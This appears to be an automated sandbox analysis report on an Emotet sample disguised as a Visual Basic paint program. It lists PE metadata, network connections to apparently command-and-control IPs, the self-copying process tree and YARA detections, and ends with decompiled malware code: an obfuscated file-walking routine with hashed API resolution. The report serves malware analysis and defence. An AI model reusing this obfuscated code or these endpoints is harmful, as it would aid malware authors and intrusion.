IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x23c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6ab00	0x6b000	False	0.600259656104	data	6.95649403306	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x6c000	0x33d0	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x70000	0x20b58	0x21000	False	0.463526870265	data	5.11995480299	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x70968	0x2e8	data
RT_ICON	0x70c50	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x70d78	0xea8	data
RT_ICON	0x71c20	0x8a8	data
RT_ICON	0x724c8	0x6c8	data
RT_ICON	0x72b90	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x730f8	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294903776
RT_ICON	0x77320	0x25a8	data
RT_ICON	0x798c8	0x10a8	data
RT_ICON	0x7a970	0x988	data
RT_ICON	0x7b2f8	0x468	GLS_BINARY_LSB_FIRST
RT_STRING	0x7b760	0x34	data
RT_STRING	0x7b794	0x84	data
RT_STRING	0x7b818	0x140	data
RT_STRING	0x7b958	0x158	data
RT_STRING	0x7bab0	0x220	data
RT_STRING	0x7bcd0	0x3cc	data
RT_STRING	0x7c09c	0x5c	data
RT_STRING	0x7c0f8	0x3c	data
RT_STRING	0x7c134	0x130	data
RT_STRING	0x7c264	0x1f4	data
RT_STRING	0x7c458	0x68	data
RT_STRING	0x7c4c0	0x40	data
RT_STRING	0x7c500	0x150	data
RT_STRING	0x7c650	0x100	data
RT_STRING	0x7c750	0x64	data
RT_STRING	0x7c7b4	0x70	data
RT_STRING	0x7c824	0x34	data
RT_STRING	0x7c858	0x60	data
RT_STRING	0x7c8b8	0xac	data
RT_STRING	0x7c964	0x64	data
RT_STRING	0x7c9c8	0x168	data
RT_STRING	0x7cb30	0x10c	data
RT_STRING	0x7cc3c	0x7c	data
RT_STRING	0x7ccb8	0x48	data
RT_STRING	0x7cd00	0xd8	data
RT_STRING	0x7cdd8	0xfc	data
RT_STRING	0x7ced4	0x188	data
RT_STRING	0x7d05c	0x138	data
RT_STRING	0x7d194	0xd0	data
RT_STRING	0x7d264	0xdc	data
RT_STRING	0x7d340	0x7c	data
RT_STRING	0x7d3bc	0xfc	data
RT_STRING	0x7d4b8	0x5c	Hitachi SH big-endian COFF object file, not stripped, 28160 sections, symbol offset=0x6c006c00, 419450368 symbols, optional header size 29696
RT_GROUP_ICON	0x7d514	0xa0	data
RT_VERSION	0x7d5b4	0x358	data	English	United States
RT_HTML	0x7d90c	0x1324a	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

__vbaVarTstGt, __vbaVarSub, __vbaStrI2, __vbaI2Sgn, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarMove, __vbaVarVargNofree, __vbaAryMove, __vbaFreeVar, __vbaLenBstr, __vbaLateIdCall, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, __vbaVargVarCopy, _adj_fdiv_m32, __vbaAryDestruct, __vbaLateMemSt, __vbaVarPow, __vbaVarForInit, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaBoolVar, __vbaRefVarAry, __vbaBoolVarNull, _CIsin, __vbaErase, __vbaVarCmpGt, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGet3, __vbaStrCmp, __vbaGet4, __vbaAryConstruct2, __vbaVarTstEq, __vbaR4Str, __vbaDateR8, __vbaPrintObj, DllFunctionCall, __vbaCastObjVar, __vbaRedimPreserve, __vbaLbound, __vbaStrR4, _adj_fpatan, __vbaR4Var, __vbaLateIdCallLd, __vbaStrR8, __vbaRedim, EVENT_SINK_Release, _CIsqrt, __vbaVarAnd, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaI2Str, __vbaFPException, __vbaInStrVar, __vbaStrVarVal, __vbaUbound, __vbaGetOwner4, __vbaVarCat, __vbaI2Var, _CIlog, __vbaFileOpen, __vbaVar2Vec, __vbaR8Str, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, __vbaVarCmpLt, _adj_fdivr_m32, __vbaR8Var, __vbaPowerR8, _adj_fdiv_r, __vbaI4Var, __vbaVarCmpEq, __vbaAryLock, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI2, __vbaVarTstGe, __vbaFpI4, __vbaVarCopy, __vbaLateMemCallLd, __vbaR8IntI2, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, __vbaLateIdSt, _CItan, __vbaAryUnlock, __vbaVarForNext, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Stephan Kirchmaier
InternalName	SEKPaint2
FileVersion	1.00
CompanyName	KIRCHMAIER PRODUCTIONS
Comments	Vote for it on www.planet-source-code.com and visit my german website: www.vb-empire.de.vu
ProductName	SEK Paint 2.0
ProductVersion	1.00
OriginalFilename	SEKPaint2.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 19, 2021 12:35:31.109077930 CEST	49746	80	192.168.2.4	88.153.35.32
Jun 19, 2021 12:35:34.119590044 CEST	49746	80	192.168.2.4	88.153.35.32
Jun 19, 2021 12:35:40.182681084 CEST	49746	80	192.168.2.4	88.153.35.32
Jun 19, 2021 12:35:54.851826906 CEST	49759	8080	192.168.2.4	107.170.146.252
Jun 19, 2021 12:35:57.855988979 CEST	49759	8080	192.168.2.4	107.170.146.252
Jun 19, 2021 12:36:03.856445074 CEST	49759	8080	192.168.2.4	107.170.146.252
Jun 19, 2021 12:36:18.393426895 CEST	49768	7080	192.168.2.4	173.212.214.235
Jun 19, 2021 12:36:18.446907043 CEST	7080	49768	173.212.214.235	192.168.2.4
Jun 19, 2021 12:36:18.953871965 CEST	49768	7080	192.168.2.4	173.212.214.235
Jun 19, 2021 12:36:19.007333040 CEST	7080	49768	173.212.214.235	192.168.2.4
Jun 19, 2021 12:36:19.514175892 CEST	49768	7080	192.168.2.4	173.212.214.235
Jun 19, 2021 12:36:19.568480015 CEST	7080	49768	173.212.214.235	192.168.2.4
Jun 19, 2021 12:36:23.581317902 CEST	49769	8080	192.168.2.4	167.114.153.111
Jun 19, 2021 12:36:23.711188078 CEST	8080	49769	167.114.153.111	192.168.2.4
Jun 19, 2021 12:36:24.217657089 CEST	49769	8080	192.168.2.4	167.114.153.111
Jun 19, 2021 12:36:24.347280979 CEST	8080	49769	167.114.153.111	192.168.2.4
Jun 19, 2021 12:36:24.858267069 CEST	49769	8080	192.168.2.4	167.114.153.111
Jun 19, 2021 12:36:24.987873077 CEST	8080	49769	167.114.153.111	192.168.2.4
Jun 19, 2021 12:36:28.246906042 CEST	49770	443	192.168.2.4	202.141.243.254
Jun 19, 2021 12:36:31.251487970 CEST	49770	443	192.168.2.4	202.141.243.254
Jun 19, 2021 12:36:37.265808105 CEST	49770	443	192.168.2.4	202.141.243.254
Jun 19, 2021 12:36:53.206327915 CEST	49773	80	192.168.2.4	75.143.247.51
Jun 19, 2021 12:36:56.220320940 CEST	49773	80	192.168.2.4	75.143.247.51
Jun 19, 2021 12:37:02.221344948 CEST	49773	80	192.168.2.4	75.143.247.51

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 19, 2021 12:34:47.541843891 CEST	53	64646	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:47.842386007 CEST	65298	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:47.901619911 CEST	53	65298	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:48.509916067 CEST	59123	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:48.589531898 CEST	53	59123	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:49.027923107 CEST	54531	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:49.103853941 CEST	53	54531	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:49.356436968 CEST	49714	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:49.415045023 CEST	53	49714	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:49.451854944 CEST	58028	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:49.502305984 CEST	53	58028	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:49.590219021 CEST	53097	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:49.641386032 CEST	53	53097	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:50.774936914 CEST	49257	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:50.832240105 CEST	53	49257	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:51.665215015 CEST	62389	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:51.718415022 CEST	53	62389	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:52.665755033 CEST	49910	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:52.725126982 CEST	53	49910	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:53.368653059 CEST	55854	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:53.437808990 CEST	53	55854	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:53.575293064 CEST	64549	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:53.634332895 CEST	53	64549	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:54.713341951 CEST	63153	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:54.763977051 CEST	53	63153	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:55.688761950 CEST	52991	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:55.745709896 CEST	53	52991	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:56.982321024 CEST	53700	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:57.053324938 CEST	53	53700	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:57.820481062 CEST	51726	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:57.870575905 CEST	53	51726	8.8.8.8	192.168.2.4
Jun 19, 2021 12:34:58.686284065 CEST	56794	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:34:58.739619970 CEST	53	56794	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:00.141185999 CEST	56534	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:00.194149971 CEST	53	56534	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:01.402429104 CEST	56627	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:01.455183029 CEST	53	56627	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:02.454699993 CEST	56621	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:02.505568027 CEST	53	56621	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:03.730135918 CEST	63116	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:03.780586004 CEST	53	63116	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:04.910907030 CEST	64078	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:04.961116076 CEST	53	64078	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:06.141086102 CEST	64801	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:06.205550909 CEST	53	64801	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:08.245841980 CEST	61721	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:08.306629896 CEST	53	61721	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:12.413589001 CEST	51255	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:12.463742018 CEST	53	51255	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:22.125665903 CEST	61522	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:22.192511082 CEST	53	61522	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:39.349493980 CEST	52337	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:39.487968922 CEST	53	52337	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:40.111411095 CEST	55046	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:40.173458099 CEST	53	55046	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:40.446387053 CEST	49612	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:40.522377014 CEST	53	49612	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:40.786273956 CEST	49285	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:40.847925901 CEST	53	49285	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:41.349319935 CEST	50601	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:41.473557949 CEST	53	50601	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:42.084738970 CEST	60875	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:42.149317980 CEST	53	60875	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:42.968019009 CEST	56448	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:43.029700041 CEST	53	56448	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:43.076215029 CEST	59172	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:43.139893055 CEST	53	59172	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:43.680202961 CEST	62420	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:43.742319107 CEST	53	62420	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:44.554521084 CEST	60579	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:44.615030050 CEST	53	60579	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:45.645695925 CEST	50183	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:45.704643011 CEST	53	50183	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:46.414676905 CEST	61531	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:46.473157883 CEST	53	61531	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:56.295228958 CEST	49228	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:56.364083052 CEST	53	49228	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:56.568028927 CEST	59794	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:56.642436981 CEST	53	59794	8.8.8.8	192.168.2.4
Jun 19, 2021 12:35:59.131083012 CEST	55916	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:35:59.194570065 CEST	53	55916	8.8.8.8	192.168.2.4
Jun 19, 2021 12:36:32.345746994 CEST	52752	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:36:32.418323994 CEST	53	52752	8.8.8.8	192.168.2.4
Jun 19, 2021 12:36:34.155272007 CEST	60542	53	192.168.2.4	8.8.8.8
Jun 19, 2021 12:36:34.223453045 CEST	53	60542	8.8.8.8	192.168.2.4

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: boI88C399w.exe PID: 7052 Parent PID: 6064

General

Start time:	12:34:53
Start date:	19/06/2021
Path:	C:\Users\user\Desktop\boI88C399w.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\boI88C399w.exe'
Imagebase:	0x400000
File size:	581632 bytes
MD5 hash:	0A82064AF051BAD014B77038D60474B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000003.658508716.0000000000602000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.661246086.0000000000602000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: splwow64.exe PID: 7072 Parent PID: 7052

General

Start time:	12:34:54
Start date:	19/06/2021
Path:	C:\Windows\splwow64.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\splwow64.exe 12288
Imagebase:	0x7ff6fea60000
File size:	130560 bytes
MD5 hash:	8D59B31FF375059E3C32B17BF31A76D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: KBDHU1.exe PID: 4780 Parent PID: 7052

General

Start time:	12:35:03
Start date:	19/06/2021
Path:	C:\Windows\SysWOW64\mos\KBDHU1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\mos\KBDHU1.exe
Imagebase:	0x400000
File size:	581632 bytes
MD5 hash:	0A82064AF051BAD014B77038D60474B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000003.716674491.00000000032E2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.906600906.00000000032D0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 7108 Parent PID: 568

General

Start time:	12:35:12
Start date:	19/06/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6812 Parent PID: 568

General

Start time:	12:35:21
Start date:	19/06/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 7032 Parent PID: 568

General

Start time:	12:35:31
Start date:	19/06/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5932 Parent PID: 568

General

Start time:	12:35:37
Start date:	19/06/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: boI88C399w.exe PID: 7052 Parent PID: 6064 boI88C399w.exeCOMMON

Execution Graph

Execution Coverage:	7.3%
Dynamic/Decrypted Code Coverage:	79%
Signature Coverage:	8%
Total number of Nodes:	1003
Total number of Limit Nodes:	104

Executed Functions

Function 02CB01F0, Relevance: 21.1, APIs: 14, Instructions: 125
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 02CB0238

Part of subcall function 02CB0D00: lstrcpynW.KERNEL32(?,00000000,00000000,00000010,02CB0B7D,00000000), ref: 02CB0D15

NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,?), ref: 02CB0253
GetProcessHeap.KERNEL32(?,?,?), ref: 02CB026E
HeapFree.KERNEL32(00000000,00000001,00000000,?,?,?), ref: 02CB0277
GetProcessHeap.KERNEL32(?,?,?), ref: 02CB027C
RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 02CB0289
GetCurrentProcess.KERNEL32(?,?,?), ref: 02CB0290
NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,?,?), ref: 02CB02A3
RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 02CB02CA
RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 02CB02E1
RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 02CB0303
RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 02CB031A
RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 02CB0331
RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 02CB034C

Memory Dump Source

Source File: 00000000.00000002.663754872.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cb0000_boI88C399w.jbxd

Similarity

API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
String ID:
API String ID: 482429597-0
Opcode ID: 60e628d7cc09253e0528630b4ce1e61b0b5c367b47a99d01a60c75b6c5a8bef8
Instruction ID: 36fd20ec9b6c07acb9dcef24be9b62a668eee25b10ed60735bec7d2dd2805a16
Opcode Fuzzy Hash: 60e628d7cc09253e0528630b4ce1e61b0b5c367b47a99d01a60c75b6c5a8bef8
Instruction Fuzzy Hash: 974100B15147047EE661EB74C890FAFB7AEAFC8710F108D1DB644A7280DB75E5089BA3

Uniqueness

Uniqueness Score: -1.00%

Function 02CC38F0, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 189
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E02CC38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v524;
				short _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				signed int _t24;
				intOrPtr* _t28;
				intOrPtr _t33;
				void* _t35;
				intOrPtr* _t39;
				intOrPtr* _t41;
				intOrPtr* _t43;
				signed int _t49;
				int _t55;
				void* _t58;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t100;

				_t93 = __ecx;
				_t97 = __edx;
				_v1640 = __ecx;
				_t22 = 0x1b0f738d;
				_t58 = _v1640;
				goto L1;
				do {
					while(1) {
						L1:
						_t100 = _t22 - 0xd5d5438;
						if(_t100 <= 0) {
							break;
						}
						if(_t22 == 0x1b0f738d) {
							_t22 = 0x1c39f1c;
							continue;
						} else {
							if(_t22 != 0x3aa0d798) {
								goto L6;
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t24 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t24 & 0xffb9c0ef) + 0x651b5f5;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L30:
										if(_t97 == 0) {
											goto L29;
										} else {
											_t96 = E02CC34C0(0x2ccd260);
											_t28 =  *0x2ccdc60;
											if(_t28 == 0) {
												_t28 = E02CC3E80(_t58, E02CC3F20(0xe66945e6), 0xcca28b0d, _t97);
												 *0x2ccdc60 = _t28;
											}
											 *_t28( &_v524, 0x104, _t96, _t93,  &(_v1636.cFileName));
											E02CC38F0( &_v524, _t97, _a4, _a8);
											_t98 = _t98 + 0x1c;
											E02CC3460(_t96);
											_t22 = 0x60b76e4;
										}
									} else {
										_t33 = _v1590;
										if(_t33 == 0 || _t33 == 0x2e && _v1588 == 0) {
											L29:
											_t22 = 0x60b76e4;
										} else {
											goto L30;
										}
									}
								}
								continue;
							}
						}
						L40:
					}
					if(_t100 == 0) {
						if( *0x2cce004 == 0) {
							 *0x2cce004 = E02CC3E80(_t58, E02CC3F20(0xbb398380), 0xf53ce71f, _t97);
						}
						_t35 = FindFirstFileW( &_v1044,  &_v1636); // executed
						_t58 = _t35;
						if(_t58 == 0xffffffff) {
							return _t35;
						} else {
							_t22 = 0x3aa0d798;
							goto L1;
						}
					} else {
						if(_t22 == 0x1c39f1c) {
							_t95 = E02CC34C0(0x2ccd240);
							_t39 =  *0x2ccdc60;
							if(_t39 == 0) {
								_t39 = E02CC3E80(_t58, E02CC3F20(0xe66945e6), 0xcca28b0d, _t97);
								 *0x2ccdc60 = _t39;
							}
							 *_t39( &_v1044, 0x104, _t95, _t93);
							_t41 =  *0x2ccdea8;
							_t98 = _t98 + 0x10;
							if(_t41 == 0) {
								_t41 = E02CC3E80(_t58, E02CC3F20(0xbb398380), 0x97f883e, _t97);
								 *0x2ccdea8 = _t41;
							}
							_t94 =  *_t41();
							_t43 =  *0x2cce1a0;
							if(_t43 == 0) {
								_t43 = E02CC3E80(_t58, E02CC3F20(0xbb398380), 0x26c3f343, _t97);
								 *0x2cce1a0 = _t43;
							}
							 *_t43(_t94, 0, _t95);
							_t93 = _v1652;
							_t22 = 0xd5d5438;
							goto L1;
						} else {
							if(_t22 == 0x60b76e4) {
								if( *0x2ccdfd4 == 0) {
									 *0x2ccdfd4 = E02CC3E80(_t58, E02CC3F20(0xbb398380), 0xd3e90d14, _t97);
								}
								_t49 = FindNextFileW(_t58,  &_v1636); // executed
								asm("sbb eax, eax");
								_t22 = ( ~_t49 & 0x344f21a3) + 0x651b5f5;
								goto L1;
							} else {
								if(_t22 == 0x651b5f5) {
									if( *0x2cce064 == 0) {
										 *0x2cce064 = E02CC3E80(_t58, E02CC3F20(0xbb398380), 0xa4a77084, _t97);
									}
									_t55 = FindClose(_t58); // executed
									return _t55;
								}
								goto L6;
							}
						}
					}
					goto L40;
					L6:
				} while (_t22 != 0x36605fc2);
				return _t22;
				goto L40;
			}

0x02cc38fa
0x02cc38fc
0x02cc38fe
0x02cc3902
0x02cc3907
0x02cc390b
0x02cc3910
0x02cc3910
0x02cc3910
0x02cc3910
0x02cc3915
0x00000000
0x00000000
0x02cc3a79
0x02cc3b62
0x00000000
0x02cc3a7f
0x02cc3a84
0x00000000
0x02cc3a8a
0x02cc3a8f
0x02cc3b48
0x02cc3b51
0x02cc3b58
0x02cc3a95
0x02cc3a9b
0x02cc3abf
0x02cc3ac1
0x00000000
0x02cc3ac3
0x02cc3acd
0x02cc3acf
0x02cc3ad6
0x02cc3ae9
0x02cc3aee
0x02cc3aee
0x02cc3b07
0x02cc3b23
0x02cc3b28
0x02cc3b2d
0x02cc3b32
0x02cc3b32
0x02cc3a9d
0x02cc3a9d
0x02cc3aa5
0x02cc3ab5
0x02cc3ab5
0x00000000
0x00000000
0x00000000
0x02cc3aa5
0x02cc3a9b
0x00000000
0x02cc3a8f
0x02cc3a84
0x00000000
0x02cc3a79
0x02cc391b
0x02cc3a33
0x02cc3a4b
0x02cc3a4b
0x02cc3a5d
0x02cc3a5f
0x02cc3a64
0x02cc3b9d
0x02cc3a6a
0x02cc3a6a
0x00000000
0x02cc3a6a
0x02cc3921
0x02cc3926
0x02cc3992
0x02cc3994
0x02cc399b
0x02cc39ae
0x02cc39b3
0x02cc39b3
0x02cc39c7
0x02cc39c9
0x02cc39ce
0x02cc39d3
0x02cc39e6
0x02cc39eb
0x02cc39eb
0x02cc39f2
0x02cc39f4
0x02cc39fb
0x02cc3a0e
0x02cc3a13
0x02cc3a13
0x02cc3a1c
0x02cc3a1e
0x02cc3a22
0x00000000
0x02cc3928
0x02cc392d
0x02cc3953
0x02cc396b
0x02cc396b
0x02cc3976
0x02cc397a
0x02cc3981
0x00000000
0x02cc392f
0x02cc3934
0x02cc3b73
0x02cc3b8b
0x02cc3b8b
0x02cc3b91
0x00000000
0x02cc3b91
0x00000000
0x02cc3934
0x02cc392d
0x02cc3926
0x00000000
0x02cc393a
0x02cc393a
0x02cc394b
0x00000000

APIs

FindNextFileW.KERNELBASE(?,?,00000000,02CC998D,16BF64F2,00000001), ref: 02CC3976
FindFirstFileW.KERNELBASE(?,?,00000000,02CC998D,16BF64F2,00000001), ref: 02CC3A5D
FindClose.KERNELBASE(?,00000000,02CC998D,16BF64F2,00000001), ref: 02CC3B91

Strings

8T], xrefs: 02CC3910
Ei, xrefs: 02CC399D
8T], xrefs: 02CC3A22
Ei, xrefs: 02CC3AD8
., xrefs: 02CC3A95

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

